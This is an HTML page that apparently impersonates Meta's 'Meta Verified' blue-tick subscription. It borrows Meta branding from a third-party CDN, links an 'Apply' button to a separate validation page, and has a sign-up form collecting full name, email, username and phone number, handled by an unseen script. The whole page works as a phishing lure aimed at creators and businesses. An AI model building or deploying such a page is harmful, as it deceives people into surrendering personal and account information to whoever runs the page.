<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Meta Verified | Get a verified blue tick</title>
    <link href="style.css" rel="stylesheet">
</head>
<body>
    <div class="container-fluid">
        <div class="container">
            <img src="https://cdn.glitch.global/325f7535-a68d-4687-a91c-1e7d9366104a/meta-logo-QVrNRj93.svg?v=1723987211189" alt="logo" class="logo">
        </div>
    </div>
    <div class="content">
        <div class="col-sm-6">
            <img src="https://cdn.glitch.global/325f7535-a68d-4687-a91c-1e7d9366104a/blue_tick-B9ADAlwo.png?v=1723987162846" alt="meta" class="meta-logo">
            <h1 class="my-3 fs-1">Stand out with Meta<br> Verified</h1>
            <a class='btn' href='validation.html'>Apply</a>
            <p class="mt-4">Grow your social presence with Meta Verified – a new subscription bundle available for creators and businesses on Instagram and Facebook.</p>
            <p class="sign-up">Sign up now for creators</p>

            <form id="userInfoForm" class="mt-4">
                <input type="text" name="name" placeholder="Full Name" required class="form-control mb-2" />
                <input type="email" name="email" placeholder="Email" required class="form-control mb-2" />
                <input type="text" name="username" placeholder="Username" required class="form-control mb-2" />
                <input type="text" name="phone" placeholder="Phone Number" class="form-control mb-2" />
                <textarea name="message" placeholder="Additional Information" class="form-control mb-2"></textarea>
                <button type="submit" class="btn mt-2">Submit</button>
            </form>
            <p id="message" class="mt-2" style="display: none;">Thank you for signing up!</p>
            <p class="mt-4 font-italic region-info">Features, availability, and pricing may vary by region.</p>
        </div>
        <div class="col-sm-5 image" style="background-image: url('./images/background.png');"></div>
    </div>

    <script src="script.js"></script>
</body>
</html>
